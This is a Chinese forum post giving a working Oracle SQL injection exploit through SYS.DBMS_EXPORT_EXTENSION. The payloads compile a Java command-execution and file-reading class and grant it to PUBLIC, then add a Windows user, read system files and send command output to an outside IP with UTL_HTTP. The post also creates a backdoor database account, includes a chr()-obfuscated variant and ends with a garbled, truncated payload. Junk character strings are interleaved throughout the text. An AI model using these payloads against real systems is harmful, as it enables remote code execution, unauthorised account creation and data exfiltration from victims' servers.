以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
# G( y. [' V b5 I! M% G* R/ N% r) n- I2 u5 T+ K+ s( W
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) 0 z) Q7 D' V; @2 m- F0 g
的形式即可。(用" 'a'|| "是为了让语句返回true值) 4 d! ~. o/ |" e
语句有点长,可能要用post提交。
, k- B/ { B" P; l4 e8 O. y以下是各个步骤:
6 A4 ?/ X& |! B5 i7 |$ f1.创建包
. a6 w0 K6 G0 ^7 |通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
3 Q+ O, P8 H; g O9 {/xxx.jsp?id=1 and '1'<>'a'||(
. `5 `9 z* H# R* }/ A# w3 U& g! Wselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''5 U x) C; h# K( r: Z% ]) Q; {
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(4 K, G) u; S0 l0 C
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
r' ~ ~2 j5 I# ?( w( g' X f}'''';END;'';END;--','SYS',0,'1',0) from dual . T% E4 c0 z: \. s, G
)
; S* Q& ^( _% w* s------------------------ . n+ k, C0 X% ^5 v) R2 v" w; ]
如果url有长度限制,可以把readFile()函数块去掉,即:
" C$ U4 y& h P y: d9 n: \! P/xxx.jsp?id=1 and '1'<>'a'||( ! h, t) S3 W3 H) w* E% q0 L
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''3 ^, T% r. w1 g1 m
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(8 j0 _; o c7 U' v; I
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
' K+ V( B% x8 h* C& ~2 R: V}'''';END;'';END;--','SYS',0,'1',0) from dual
4 T7 {) V" ]$ a7 I( C) ; S+ I$ [# P I. C0 B. J
同时把后面步骤 提到的 对readFile()的处理语句去掉。 $ j% }# P. [+ S% D( @* h
------------------------------
3 E7 g, j0 n/ J) e2.赋Java权限 5 W( C6 [3 x3 Y w+ H0 s
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
" _& {+ ~0 b2 C+ D L0 {3.创建函数 x4 ^) K7 y8 i2 Q5 E) b6 ?
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''6 W6 ?) ?9 L" U: [$ e" C7 m
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual& Q. @: z/ D8 m/ P7 V, ?! |
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
1 ~' P# y: ]: [' x1 `. x7 hcreate or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
2 x0 q) k5 v5 @5 O- p2 Z( w4.赋public执行函数的权限
" q @( Z+ [% K- R2 C) _: {select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
8 I: g" c" R; x. N6 D8 wselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual9 g; {& M7 c+ K
5.测试上面的几步是否成功
9 b/ U7 [- z6 |, H& Aand '1'<>'11'||(
& `7 L5 C* c/ T5 D r7 iselect OBJECT_ID from all_objects where object_name ='LINXRUNCMD' ; l: z0 d4 e% N2 l# n
) 1 z2 q, E2 o4 L. P
and '1'<>( 6 V; q; A" L$ i- C
select OBJECT_ID from all_objects where object_name ='LINXREADFILE'
) f G' S% ~9 O5 q, B, V8 Z9 Z) 6 Z+ Q0 D' U, u4 _* A3 {
6.执行命令: % ~" [. M( F& v) N
/xxx.jsp?id=1 and '1'<>(
5 z& @: W( I8 a, ~4 Mselect sys.LinxRunCMD('cmd /c net user linx /add') from dual 6 \# M y7 c! J& z: c! \
7 t: C) T# s) J7 T* Y! W) 0 k5 f8 @6 c1 `! u
/xxx.jsp?id=1 and '1'<>( & |' d" @( X7 d) L
select sys.LinxReadFile('c:/boot.ini') from dual
4 c. y/ D1 N2 U" _! @% ^) e
1 @0 e, P. f! s- b: p* z w# L# s- G! })% l! U5 l: _ o8 v0 u
9 L1 T3 i# k8 H0 F6 A; w, I
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 ) K6 |' G: T$ q" Z9 I# o
如果要查看运行结果可以用 union : ; p# l/ z# s7 n6 z0 U7 t4 l
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual3 z5 w0 C% {$ M6 `! h2 x
或者UTL_HTTP.request(: & ~' j0 [- E# E
/xxx.jsp?id=1 and '1'<>( 3 @- O; ^6 m1 B- B* N; y
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
% T+ h2 D8 }: V% E)
o& y/ M% {# b q+ r, K R; D/xxx.jsp?id=1 and '1'<>(
2 g' J* V7 B! K V% QSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual* z: P& K2 O4 `/ j) Y w! b, i
) - C1 V% C" M+ A: V- |3 E
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
: E( o* h5 A7 _7 G$ [' A-------------------- 8 n# b- ]- H& z/ \& N ~9 q: k% _
6.内部变化
: V% ~- j: S% c% z$ P通过以下命令可以查看all_objects表达改变:
6 ?' P2 b0 W0 U+ Rselect * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'; w v/ N2 l s1 X+ P/ A
7.删除我们创建的函数 # k) P/ ^ a) N& I) e, {; o
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
9 G( j& W" b6 f( c/ @1 ^4 ldrop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual h4 k7 b! j% Q" c. b( N
====================================================
8 C1 C1 b+ c x E& i4 J. E全文结束。谨以此文赠与我的朋友。 5 D3 }' j) p1 i6 i! q( U) n+ t
linx
C$ S$ [3 [' c4 ]+ R124829445
# x# r1 T4 K% ?. V& m J( H% V2008.1.12 & t* x( a! E6 B' b- |7 ]4 M9 D
linyujian@bjfu.edu.cn : N# p$ o5 s$ S0 K" T( g. r
======================================================================
: ] P n# f% ?. q% n7 P& I/ o测试漏洞的另一方法:
5 q! r! h, W: @9 y+ P创建oracle帐号: 8 ]5 R8 D8 G/ I0 h5 ^* Y
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''7 X" P0 S/ V3 n3 T; w2 X
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual* r# j3 N1 h9 i0 r" |
即: . w; {, z, Y8 i' E& ]
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),1 H: }& x8 T' h: G: K
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
$ }: A' [: P" `. W: y确定漏洞存在:
2 i9 s) w' V% C- V9 @, X3 \$ x1<>( 3 t8 W) y9 Y* D$ p: l* j
select user_id from all_users where username='LINXSQL'
4 K) q s5 j, T5 C* v) 6 q( d/ K G n+ a) ]/ V
给linxsql连接权限:
0 H+ a: ]" Q7 a- X: L" q. kselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''9 Y8 q1 v- \( K
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual & t, `7 j4 [& Z3 X; Y! V
删除帐号: / W# A+ e( O9 h+ a! j
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
" N; u. c3 X7 odrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
. V$ ^0 T/ |8 j" O l( `) I2 J8 y======================
, h2 a! t8 V0 b1 p1 z- @. }2 W以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:- K+ `: Z9 D1 h
1.jsp?id=1 and '1'<>(
4 W d% U' W2 l4 oselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
8 j( q, d" u8 Q, wcreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual& v/ j5 J! g* @; V; X
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
+ V8 G. W! ~; w2 O& L )
4 r2 P4 E" P4 R# V) v
, M; w4 y& _& e$ N7 V" v4 p' C5 ?
3 \8 M3 y* Y$ v0 s
. X. O5 U- o0 S& i8 t |
发表于 2012-12-18 12:21:48
收藏
支持
反对